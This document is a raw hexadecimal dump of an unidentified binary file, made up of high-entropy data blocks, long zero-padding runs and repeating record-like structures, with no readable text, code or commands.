D8442EB6F23BFE65379B0960CA2D56AD9CE50212FE2AFF58E557A62EBA8A0DCC265B0C900ADD89CC2C194E6B1A0FBBC94C5461B40B609AF5AAA81346AA6D796B169395A2AAD95F7FA3CBF0330C7D0BD5B9A41DBFBAF54CF30AF0CC700126BAF03F61489C4512B6A0F9B9174B86D53EBA53C260594196B8676D75839E2CE3A5E617930C9BE93A322BB4D698E822029AEC66B555794D76335AAABD9CE57FC4A00E233503436C236BD5EC2837136C7F36BB921531311787F719962761BD3B1BDF4B26A7B0C1ECCBFF775AEEB063C0B16B2608B66AB7F3436C9D6CCCADB682B6739B891280385EEE2B12AA675FB59342CD3FD5AAA5DC2549634D93605E42EB257ED71E08967A2F208B85128AEAFFB2046D2FD174DBEB06C5222B3F9BF0A238CF3FD43115B8261D5E18F60024E01E07EC2932043FF3D4D8E5FE77E54DE4EE5C2D6DE01922F30BCA45EDBF6FE0FC122EDCE0B212EA314E3A004AA294D95E63A0880A6BB19AD555E535D8CD6AAAF67394A00E2165C12A4FE11AA9D762FAAAA53B0591E0A505183D384A9BE3A2BA403CB72C747253613CA8ECFEB652A199683B54320A190FD99D8B1C3FD9A6C6B46BCD993905AAD9CE528038C95752895575F505FADBA7956EFCB6E99619D0D52B63595551789E36264E701FCC7A04C950A222A41AF5A8CC2B219158B54B07BEA4F27BEAF0DDB0012740F01F6149A1A6B83D3CBB865C1E941387F61ED97F699A7D80596915F285D353815606B89D586EEEF4D5FE3817463D3FFF3604C02F1D0480535D8CD6AAAF29AEC66B5557B39CA5007105DCAA3D440DFA085A8D89C46B2111CD42755054F690C208BFE2287196334197E14DA0A7145E5B21420C97A52B3441E72B9D15B609CDF66D2FCADB316A2B47F1DE6CAD9CE5544A00E15D4A00E1498B4C65E8414E802035814DAABB6A16D5BEB8A27FA9C3FF05B45EC6C63FF5094ACABFCF196BEA93CC55F9D8B8760DABC81FD2937D014223B2CA84F32E1933DAC0685787288009361781FB0A44C12963B32B0C1F76E5338494BE1F2117218146F591FF80EA50BD09612E23B2830F463344B3D9F0F47412014D76335AAABCA6BB19AD555ECE72817414C9401C263138837135ABAAF051A89A8C5DB416CE2915EBE9F052537653ABBB5B81D16DB2871A1B6AAA76F29DE9DE29BE85C3E883DF9B6A367AB7B7E2164EBDECBFE831CA29809A773CAD9CE50E24A00E12D534A00E129A8A8D7EEB07D41545145F85DA330DD9728AEE48DE76BDAEE851006B6D64DBD01824A76D856486A2646304F1E504A3545989C833DA70C9C832031E5471F22F37716E19018E433B97578632800937B781FB0A4CD72028B58E149FEDFE87ACDEC8EFAB8AD08E427F325AA9952EA6DD69A739243B2B2E7F27D71EF8EAC68C731D0440535D8CD6AAAF29AEC66B5557B39CA500712E2E94B53A819451DD8A7E28A7F6CE2C2F17A019C29C8DA24E3B96F6F87BC81DADB56266504EC96CEA08FCDF9F9D9EF3A11087E3CA68B25B277B2AACAB79AB6739A97128038A6902554A686904509B4DE2E17965C1177A4B1096A392D597D1290AB553D89667E698B7CCB5E5B24DC22D7DC90332B16BB2D64EE1FE79D5C163A381C796FBD6ADCB45B2F3B39C87F61FB8A3212F48082C4707AD526894FEBB7F3361FFDB55C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000025D000000000C7B00000064240000010142007B00811020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040025E000000000C7B000000A6240000010141007B008A1020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040025F000000000C33000000E724000001014200330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680260000000000C7B00000029250000010141007B008910200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400261000000000C7B0000006A250000010142007B008210200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400262000000000C33000000AC25000001014200330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680263000000000C7B000000EE250000010142007B008110200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400264000000000C7B00000030260000010142007B008A10200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400265000000000C330000007226000001014200330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680266000000000C7B000000B4260000010142007B008910200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400267000000000C7B000000F6260000010142007B008210200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400268000000000C330000003827000001014100330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED7833168000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000820000115DE205511B0000CE0599011000000000089D0B00007C2100009D0BF800007058009334781FB0A44800D1ED84BCEEF972830F248C03D23F922DEF9EDC47F6D863869FFB6A63E3B61761A8E824029AEC66B555794D76335AAABD9CE63BA50070CE20528AE05510BE857AE8AEAD93A12B086294E1920895D4F1E1B5EAF649B44EB42353307A6B0967AAF33BA9BED6E14516C1CFA177745F92D47E7F42B0CF0F9D10527CFEB1BFF174CB665DDAD56CE729401C47512AE475B4B7D3A8A920D4FD0C109F49138531FBA5B66FE52828CC1524CA33867B293FA0796FD3F456D8064564DFEEC01AB3E770EC6D0B2DDBB47385A68D629C16F9A5A58A89FC1D8E4F5C2BC31440049B23C0FD8527611B6B9230CB663A9521F90BC145A17A940A1A20BC1E527EE10B2CBC9D1DA8B734DA67DF0EB16B0C87411014D76335AAABCA6BB19AD555ECE729401C410BA2E4A25EAB5FA4F8CD4A84556BCA2F3325908CC81E582C6B2660935FFC16D42F8C4B312D12FCFC2F39448FFAF7E15B36F49A65496BC3A61DFA1702D81D5B39CA500712C2802855B54F728A29CD0DD521A9D47144059004CBCA6A3BDFA0B713A85A84142564E67C7956BD943085253850B0D0D9C05F77E2F60811869BABC32840049B2BC0FD8526413F213406283C0EFB52AF58084872C99B4C4FED2BC86F2A7814C9B261B91EF6ACF92FC03C12578C43A0880A6BB19AD555E535D8CD6AAAF6739A9752803867157C37299BBD8B5557AA04E9C0F5724724E3A8AB087615AD7E0FDE82D316C8595DA9F964823A00E90CD29A6CAFCA5E998580DA12405CBC8334A0D79DDA612AD9CE6E258B4A00E1DB8E82A0FE834537D1AAA435E4C66402AE888E11FE87A2F19D6554EEADC820B24C3CD6E85AD64A7B2FC16BA6EBDE3B3B1D1EA75B4D558885B02BC35A40049A63C0FD85236210C1D8B883DACEF305BDB0E32CB9E3E69D7C955E1BDA7CA31B4A608F2B20D72786B39E4887412014D76335AAABCA6BB19AD555ECE72A024A00E140418E409BA0D04B3D42A2EB61BB6BC612C9DB862E6A2C851599038456AF1A507EFE7A082EBCF51AAF9185998B1DC6B4B7A86DE6860CD9A6EC130A77A6FB8660FB2502D6998245D5B39CAFDA500712ECAB1526BCD35B1CD6429D459BD58A9D6E6A5E813677A8794D84DEFEDB83EB6C984E0BBC7BADB2DD42D1D9CA0943F43D334EC61419F14FCBC0CB2531EC5AF360EF62BC36F40049ACBC0FD85266102D2920CE438DA51A9642861680544312D3F782D691B8876359712BE3E91D69BC59522C5C8F83A0900A6BB19AD555E535D8CD6AAAF67394A00E2B74109E6BFFAA5FB46A698FF0A5534FC5DDD4D78D7999840999B266B0ED54C3B4DFD3443EA5BA6DF99CD01477E42F96DCC9033464FA081C82E666D7680E229DD7F0C3AC7ECD3A04CDA4A4AD9CE52803870D51F5421095915AC44A0AB2EAAB75AF4DD85A335F2FCD1A6A15D46E5DA5E6FAC6B1E834FD34741DBC2163957056A09E45EC066EB13A6C8673B3D1B64DC9A8A00E1E52F0D46AF0CA700126EAF03F61499049DA555331C2E6CBD27E65FFBFB5D1D8AF8F1A3602C5D393C057B6E8DBF22CBCBDF7081A6A7BA82D43E8E822029AEC66B555794D76335AAABD9CE52803882625A0944BBE34BC89E810D2EBF5945746AD42B21B45346B61448D328AD314EA2DF430AC9142830640C71698512DF4EF5E95EBF017529BFD99DE2A85F7C9495B39CA0424A00E1BCBE85C41753A157ED00469FAD5A87F40ADCBA9A16CDAA51C4DA2B2158E8B6D6BB47FD4060F4DF27344B3F37BEB3D42D52BEEF617BD0666E7D6CD5E18EE0024E11E07EC29330C7D815A833D3EEED6C165EB2654A8601662910EF74C2054B3F8FE5B4B6C2D2E3C4ED77CE9AFF047B26148463A0880A6BB19AD555E535D8CD6AAAF67394A00E1EE8F4F12BE965463F4989FA9A9DE75EDF7A8D45D9ADD69301A9AB14B27069BB81E0BF2A142348F68DAB1AD47EBCEEB03090856CA15B7F1F4CDFEDB8D07F34AB67394A00E3244F1D6EE249CAAA0AA9B54058B5658891A7F347B2862DF650C559FB0455AD0FD17D1930D54CE3B5A32826E80B4A97DD96CEDA20F96BA932BC37DC0049A2BC0FD8522401B7615923A5A1FF85F8E0C74DA737A2D63B9A5F67B594725E1117225E90E340F48E58563A0900A6BB19AD555E535D8CD6AAAF67394A00E1F38F1501D0A9AA0A3525EDFBA0CFA8BCEE805F7F0B3CEA6859D4F8A3F5E533B979368237F2D6581BCEE9A35CCBD0FDBD40BACCAA66931184E1BCCED7FE47CDB313778714D498D0336795AC18622DC44AD9CE6E549401C43754854EC55E78E100417506242F2EE77498B133DB26250AA6DA84B5187B3CBD44D359756D5AC1E83166FAD361960D732BD2A2A720FE74721EC67BDA66B7F6D0B1A7633B2D572BCDFC10A9BE8BAD5188500FE32DB16C91552358FED94C633146990BC25DD16FA404DDF7D17EC08474DC84DF0CAE00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011100000000089D0B0000F02200009D0B080000665800939D781DB0A4EC602C24E5A5565B947B4E2F1CCB738D1A5AF01F6949BDFDDBD4AC6D3679852FADB6D0E17B26D7896DB8BFAF72F4A6A47411014D76335AAABCA6BB19AD555ECE729401C382A8FC5A1CEA497D4D78A3AD4314BC5A82999F1D026A26B1BD3A051FA5E7959358684A4F58D6E4DB2B5FCCD31420C6DBDE9E62016212ABFA8E866A256CE729401C538A069E78EE9D42AF1D00BE825E855182EF218564E2B6F451D82CF3CFC677EA9B1BCBCB028FEC604C2EEB11E5F59EC814E68F36A10393B0EF9F5A2EDF2BC32BC0049C43C0FD8526418F69DB5F5947E7B634D68E80C20FEC06D6ACDF23BB768FC39B2F76BBF462E3B7D97712D9CF0219B0B1CB3BCC7411014D76335AAABCA6BB19AD555ECE72879128038AA418B6412990CBD1B65A8FDADF82F95514D1B8871353EBE4E14D683FFBAFA392C96DF227453E66DD96B8A32D82C8764F50809D91D103145889919803CDBE676A9F9F2156CE72810D0E85280388728200967D1A8DD4EDA9AEA6D7A1AB0C503A029F5052F26420DA88FA4F0B3DFFD5929A9DB5F6763B29E84D46CF24EA90578615800933A781FB0A44C133CDEECA72A32361AC0E98F2048717768B7E4EB4BF4E335C7574B2A58CB0AF18086A3A0880A6BB19AD555E535D8CD6AAAF673940B25007126DD2EF502A82925E5E5DE5A8B670C6A05F145F758A25BB9E5A0329C30C0CCB133CF7C19A7544508DE679195F74D2D54FACFAEF281B54AD5B31F8314AC6666787E55B39CA500714EAACA7138B53F5120D5886A25A75D6CE181954597D0142C777B1448A70EC337B5B0D1A12F5B46FCFD079D9D6C146B5B3AAD9DAE601A3D7C2BC37F40049B93C0FD8526600F59A2D28A7A450303796B1BB5403E4841A737A7C8C96E248598E217B663A4E14495A244830146A8AF1D0480535D8CD6AAAF29AEC66B5557B39CA500710FC768FD3562B1902C82FF5042BFAB743F63542602655FAB559E7B36AD5AEC65F6B3136F8C90517B6808B6CB74FF04328D0598C02362F6DA3637153D848B2030491B2B6739A971280384B50E06C4E4ACBA51D1ADAF92457AD4535BE51C545C225850905E82D6A0854568632D8422BD6BCB6A89A13D83D0DE8673FC53C1EC5270B207F16C1BB367F35B9AFE86152C59068C9ACA2411F122AF0CF700126A6F03F61489C4437603F7AAC3298F0A9872522CED1A2FADE6C09C17CB0CA9016D77A649091F1839A42AC8D83A0880A6BB19AD555E535D8CD6AAAF67394A00E208546788D3DEFC4E5C09886AB7351A3C9BD6B36044A50C2C9FEC17094DDA9AD79AD6D0B660221FBE32765EAA33867FBF3FA3D3F99673BBE5B6C3F66D56CE729401C2A4A8023572B52C4BEBE20935684BAA12C9C08558285C1E6FC94626A501F58514555C12BF4496588D47F47E9D835DBE3DB239F08EC333750ADDB5BC70341AC20C766B2CB67049BEA655E19260024DA5E07EC2913887437AA68D9E72DFB3DCB8121C810623D62EEA70B6B0BC958678310CD4992BD349E00968393299FB1D0440535D8CD6AAAF29AEC66B5557B39CAA364A00E1945D0BAA36F5588A379B1B5953A095F54D3E91868425577D99EFB79D17D360DDBD0C01A8A64D3EB56B40A5FCC787513A2F1AB65B3169B596CAC91DF4BD0BD88FE641BD9356CE729401C6355827C8023BF518A55CBEDFBC4D5269921271715E96A121BE19BF459ACF5528A77D85F1FF5FAB592524D609FAF96BEA2B1BD0C9010AF0E5D00126EAF03F61499CC8D8339DB5EE4509EEC352170247CE18C99D505E035C3CBA6D3837A931E1C4478E7A5F7D878D8B0F02F0E824029AEC66B555794D76335AAABD9CE551F8F497122A92A8A7C84ADC696321B63551C5E8B4545AD87F5065EEA065B04984DE4C0EED996229363C1AC4E1D3BF9433693EA9E5147079C0730C2F7BC8D4E0BCE19B33248EAC50C86CB7C9BACF2672AD9CE50F2AE13DC4ABFE46EFAFB0A7022B277A85DBD413AD8849666519796B8B7F0FE34214EA25B267102DF437F16A767E7448F5F42758CADC993265B0418D3B7253813034F3D03B2718103CDED6002BC336C0049AB3C0FD85226006BB3EF65B26787BB72BCAF3EC1ABDF8EE588164DEEDCDF2B289B1D0B7E9386B8AEC3D2E3B71D0440535D8CD6AAAF29AEC66B5557B39CA799280385F96C755552A8ABB95F468190347362FDB356A8CAA2BDC1B468AD4FA58B6DBC17ABD13C4D450E5ACC38C9CDF82FE83CED30EC8FF79D135867640DF994521E93782B67394A00E31B74D8540554802D709DD588EF5DFD361314892D9977AC43E5D22BAF35FB5BCB21FCEF2C686C7FA26628B1130D9A89AFAD961F9B1B114AA8D0C94DBFEFD1821855D6CB4E1BD69DC8E1E4B7EC3F5630C27E195D7909B25AF7A1658427273BCE8FF31395FFD4617B14A501477437F023B61339CBF7A4C66E8CCC6BE86FD5963FB3E8D9809BC55046E04ACD8108EF275BA15C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011200000000089D0B0000632400009D0B18000065F8009377781FB0A4D8222A9B9C618B6DA99751848ECC3503D1038E3D066C47E2DC630C18A76C254397B424C1D1F7BE453091CF1D0440535D8CD6AAAF29AEC66B5557B39CA5007104A801727BD457C822722AADD3204582E93FA8D55B5451D8C8C29153D5364008588F24E1155AD875C98161FD04CF6D03EB25F9CAD919BA99A30E235EE6DFF34D5B39CA500717C39DABBEE54938BA53EB859094677EF3A65DAF96DAB11CF549D64D4D632C83FBF406A85D5E5899F3B8A766FF54D1E228BC8562891168272966D069598AF0C5900126D4F03F6149D844A2B6A1EF2DA1CEBCD3DC8EE5B6E7A6D92C63C3C21886E1013F8579191ACBCCDDA4EFD84B00A30F87411014D76335AAABCA6BB19AD555ECE729401C5548693AA0B7264BEA281C23BD450D8B19AED5461B327CCCCCB03D1BD258A27A13A316A56E23C5ADAF996A9B7A8C07EDA7C28A2C4C2A33F7B62B1DF5DE1255B39CA500714CAE0A5D096DF40999D525A2A014503202E8A094114B3C547630A2D3B649D745F4CF0CB03E4BF90E50FC993518F05935A368508ADB4389401E6CAF0CB50012686F03F61489C02C0624F94CBC7547D9C1CD098F18AEC3E7632A5A3C7923EE94D7D44A90243040DA00723A0880A6BB19AD555E535D8CD6AAAF67394A00E2DE41753AA379AC9A9BC9665C12FDD04FB653926CAA02FBECFF7E1B19AED1B799D00622CBE896649DB618B6D939BC0FBC368217CD916FB377C7697D996C8222AD9CE53CA4A00E27B42AC409C17AA162E98B86EAE9396CA15AB5DAEC62278ADA15AC83C9A18163534A4807C862D2F79F1999D85A99F84BC2C6197FCA689AF3F9B4FF32593738DF7B562BC30940049ADBC06D852261E4F58F77EF1C8D2F3C5BDA7249BB194CA9C5F6A0394C7BED40CE9FA7299BF475F5ED8BC954A58E822029AEC66B555794D76335AAABD9CE52803882447413C487EA340BD0D97EFD993AC6FA0281299C6F34D168FD0F1363B16B5449F5E4D056FA8A756F9E788CCE4CCB4C1A0515EB8FAD62F5ACA29AAD9CE63C1280389EEB14C5F5791E37517509C0BE982F5E8549126D527EB135467D2C844D1D9353BD0AD08AF3B2D6B02955DEDF229AC7BB5B2593A0EA74201BE9858AF0C5F00126CAF03F6149A1D54A335F81EFCEB2DE464D3EEE8E917816C86B0DDA3DF1FFEEF08E5F6A938952E591F9057214E148E822029AEC66B555794D76335AAABD9CE5280387192803854590BE42797D52515B8B6B04C59B6B2A8EA556A497FDFC121ADB4149FD7704A07DFAD0D8CD2A8CD0109807A56AD69203F16AD36DB55E3E9B60FD16FEAD756CE729401C6736C6A2D04C78453DA86D3F42DB037A8A8D6235E3D00DB9E86540E46AFF90AB5D36D4CA8496DBB8B119C05D35A1BEB1D9BEC7EF643F4F95E1C320024E29E07EC293B1B4E8704C8DADADC65895ED49B1218206F0DC18E381D57708EDB5EDDA765E197B6548BED5489693AB6191626B8E824029AEC66B555794D76335AAABD9CE57C5D842C4C047AABF56A62C410ABD38A29C6D31155A826B9A826431503E483A29B331A2C26845A04BC89F1627E8592CF37E52536284B1A6C73119809A28D1CE032DC9994A1DC687CAD9CE63A29D8980546EA0785483A620376BB2BD52D86F33B226F7A1597961BFE4BC9A8A010C2E02D7467CFFDA32629C2990224237FC0CE0995A0B4A19B596D9B24663535ACA7368D17B273CB1B667EE755E1ACE0024DD9E07EC293B0176799C3932C1B1C718CE862B299B4A2AE9C8405B94EC7F3A36A817DA8C12981F2C4C3645580B91421F0E824029AEC66B555794D76335AAABD9CE50F2A50070D3A1F787A2D57344F3C544D276FA12C8DA5A89098BE22D8DE588E5E87DFC676CF420EE14E06C5F6A89230B363C52C79B1DD7C472D92396FCBDD07CD9BFDA77DC36634C8F2B673943896A5007101A8254A6F21DDEE8228670FB1645329FDF1BC14AF5E74EB91E822D143EA1F5B0E22A8225B25A89697DD4031133D085A1BCCDFA2F54A66C68652CD3E7B5F42BC33240049C0BC0FD85266C1AC2E249EFF65EA2D491CB74A24B6DBC0626D7F4C0F447D2F261B50C24A7D9F4CB9C0EE05F31A4B629F2343A0880A6BB19AD555E535D8CD6AAAF67394A00E1C34A00E1A74D434EBB0D1CCACBD342F9622B0C281DBEED65EAB99851DF1F86507A06C4CBB5B0851CDA4EF04D6588A084BBB8F6FAF782C4C139085E7AEF2B668456CE729401C3869401C2F8890D470A034053F7BABCD7A8228B4068DAD2A2F3D5225E83E9AA16A7498639BF26A18B7645A05BA2AE699228A66C6BD8D24707C511FB42BB2F2E955B5D792836164E2D477EF951EAFBAF6CFD451EC3EA298A4F54C351CE7BAEAEB3BF062954D17EF29FE8CE635FEC8DAF33BAC9E2DDC7BABB8B69CD1FCBFF4B795B39CA5007171AEF8A854EAA553DC50C32A8C9A8491297EE1AA5E33A640CA509759819AAB51FE6A4A7E17AB6C9B048C29AA48E6D461C45FF40F8A561BD31B2368DF2B800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000269000000000C7B00000079270000010142007B00811020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040026A000000000C7B000000BB270000010141007B008A1020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040026B000000000C33000000FC27000001014100330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED7833168026C000000000C7B0000003D280000010142007B00891020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040026D000000000C7B0000007F280000010142007B00821020000280000080000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000003000040026E000000000C33000000C128000001014200330010814002000003000082420C9811DA4DD3D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED7833168026F000000000C7B00000003290000010183007B008110200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400270000000000C7B00000086290000010142007B008A10200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000400271000000000C33000000C829000001014100330000814002000003000082420C9811DA4DD2D752EFDC18175FDC1877A38F67AE2D2489F6DC1170E106AD3DEB86BFBB9ED78331680272000000000C7B000000092A0000010142007B008910200002800000800000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030000030